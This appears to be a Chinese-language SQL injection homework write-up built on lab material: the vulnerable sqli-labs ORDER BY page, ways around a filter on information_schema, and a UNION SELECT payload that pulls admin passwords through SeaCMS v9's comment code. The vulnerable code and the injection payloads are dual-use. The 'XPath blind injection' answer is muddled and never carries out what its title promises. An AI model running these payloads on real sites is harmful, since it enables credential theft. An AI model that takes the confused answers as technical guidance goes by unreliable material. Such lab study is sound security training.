第一题:使用Xpath对Order by 语句进行布尔盲注
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ORDER BY-Error-Numeric</title>
</head><body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00"><?php
include("../sql-connections/sql-connect.php");
$id=$_GET['sort'];
if(isset($id)){//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'SORT:'.$id."\n");fclose($fp);$sql = "SELECT * FROM users ORDER BY $id";$result = mysql_query($sql);if ($result){?><center><font color= "#00FF00" size="4"><table border=1'><tr><th> ID </th><th> USERNAME </th><th> PASSWORD </th></tr></font></font><?phpwhile ($row = mysql_fetch_assoc($result)){echo '<font color= "#00FF11" size="3">'; echo "<tr>";echo "<td>".$row['id']."</td>";echo "<td>".$row['username']."</td>";echo "<td>".$row['password']."</td>";echo "</tr>";echo "</font>";} echo "</table>";}else{echo '<font color= "#FFFF00">';print_r(mysql_error());echo "</font>"; }} else{echo "Please input parameter as SORT with numeric value<br><br><br><br>";echo "<br><br><br>";echo '<img src="../images/Less-46.jpg" /><br>';echo "Lesson Concept and code Idea by <b>D4rk</b>";}
?></font> </div></br></br></br></center>
</body>
</html>
若要在 XPath 中执行布尔盲注,你首先需要识别网页中的 sort 参数,它通常包含在 URL 中,以下是Python 示例代码,演示如何通过抓取该网页和分析 URL 中的 sort 参数
import requests
from lxml import htmlurl = "http://example.com/your_page.php?sort=1" # 攻击URL
response = requests.get(url)
tree = html.fromstring(response.text)# 假设你想查看URL中的sort参数
print("URL:", response.url) # 打印最终请求的URL# 提取网页内容
page_content = tree.xpath('//div[@style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center"]//text()')
print("网页内容:", page_content)
假设 sort 参数直接插入到 ORDER BY 子句中,可尝试不同的值,验证页面内容的变化,例如
sort=1 AND 1=1(总是为真,通常不会改变输出)
sort=1 AND 1=2(总是为假,通常导致页面没有显示任何内容)
第二题:information_schema被过滤了该如何绕过
1. 使用其他数据库表
- mysql数据库:
mysql数据库包含一些系统表,可以提供类似的信息。例如,mysql.db、mysql.tables_priv、mysql.columns_priv等。 - performance_schema:如果启用了
performance_schema,可以通过它访问某些元数据(如表、列、索引等)。 - sys数据库:如果你的MySQL版本支持
sys数据库,它可以提供比information_schema更简化的查询接口。
2. 字典表或文件系统
- 直接读取文件系统上的数据库文件和配置文件。如果数据库服务器的文件系统允许访问某些特定的文件,可能能够直接查看表结构或敏感数据。
- 如果数据库存在数据字典表,它们可能会存储有关数据库结构的其他信息。
3. 使用动态查询
- 动态SQL:某些情况下,你可以利用动态SQL来间接查询系统表。例如,构造存储过程或使用
EXECUTE来绕过过滤。
4. 使用漏洞
- 如果过滤是由特定的漏洞引起的,可能会通过利用已知漏洞绕过限制。比如,在SQL注入攻击中,如果能通过特殊字符绕过过滤,就能访问
information_schema
第三题:对seacmsv9实现联合查询注入管理员密码
<?php
session_start();
require_once("../../include/common.php");
$id = (isset($gid) && is_numeric($gid)) ? $gid : 0;
$page = (isset($page) && is_numeric($page)) ? $page : 1;
$type = (isset($type) && is_numeric($type)) ? $type : 1;
$pCount = 0;
$jsoncachefile = sea_DATA."/cache/review/$type/$id.js";
//缓存第一页的评论
if($page<2)
{if(file_exists($jsoncachefile)){$json=LoadFile($jsoncachefile);die($json);}
}
$h = ReadData($id,$page);
$rlist = array();
if($page<2)
{createTextFile($h,$jsoncachefile);
}
die($h); function ReadData($id,$page)
{global $type,$pCount,$rlist;$ret = array("","",$page,0,10,$type,$id);if($id>0){$ret[0] = Readmlist($id,$page,$ret[4]);$ret[3] = $pCount;$x = implode(',',$rlist);if(!empty($x)){$ret[1] = Readrlist($x,1,10000);}} $readData = FormatJson($ret);return $readData;
}function Readmlist($id,$page,$size)
{global $dsql,$type,$pCount,$rlist;$ml=array();if($id>0){$sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";$rs = $dsql ->GetOne($sqlCount);$pCount = ceil($rs['dd']/$size);$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";$dsql->setQuery($sql);$dsql->Execute('commentmlist');while($row=$dsql->GetArray('commentmlist')){$row['reply'].=ReadReplyID($id,$row['reply'],$rlist);$ml[]="{\"cmid\":".$row['id'].",\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".date("Y/n/j H:i:s",$row['dtime'])."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";}}$readmlist=join($ml,",");return $readmlist;
}function Readrlist($ids,$page,$size)
{global $dsql,$type;$rl=array();$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";$dsql->setQuery($sql);$dsql->Execute('commentrlist');while($row=$dsql->GetArray('commentrlist')){$rl[]="\"".$row['id']."\":{\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".$row['dtime']."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";}$readrlist=join($rl,",");return $readrlist;
}function ReadReplyID($gid,$cmid,&$rlist)
{global $dsql;if($cmid>0){if(!in_array($cmid,$rlist))$rlist[]=$cmid;$row = $dsql->GetOne("SELECT reply FROM sea_comment WHERE id=$cmid limit 0,1");if(is_array($row)){$ReplyID = ",".$row['reply'].ReadReplyID($gid,$row['reply'],$rlist);}else{$ReplyID = "";}}else{$ReplyID = "";}return $ReplyID;
}function FormatJson($json)
{$x = "{\"mlist\":[%0%],\"rlist\":{%1%},\"page\":{\"page\":%2%,\"count\":%3%,\"size\":%4%,\"type\":%5%,\"id\":%6%}}";for($i=6;$i>=0;$i--){$x=str_replace("%".$i."%",$json[$i],$x);}$formatJson = jsonescape($x);return $formatJson;
}function jsonescape($txt)
{$jsonescape=str_replace(chr(13),"",str_replace(chr(10),"",json_decode(str_replace("%u","\u",json_encode("".$txt)))));return $jsonescape;
}存在漏洞的位置
$sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";
$rs = $dsql->GetOne($sqlCount);
$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";
可将$type参数更改为一个恶意的SQL注入,进行联合查询
UNION SELECT null, null, null, null, null, null, null, null, null, username, password FROM admin_table --+
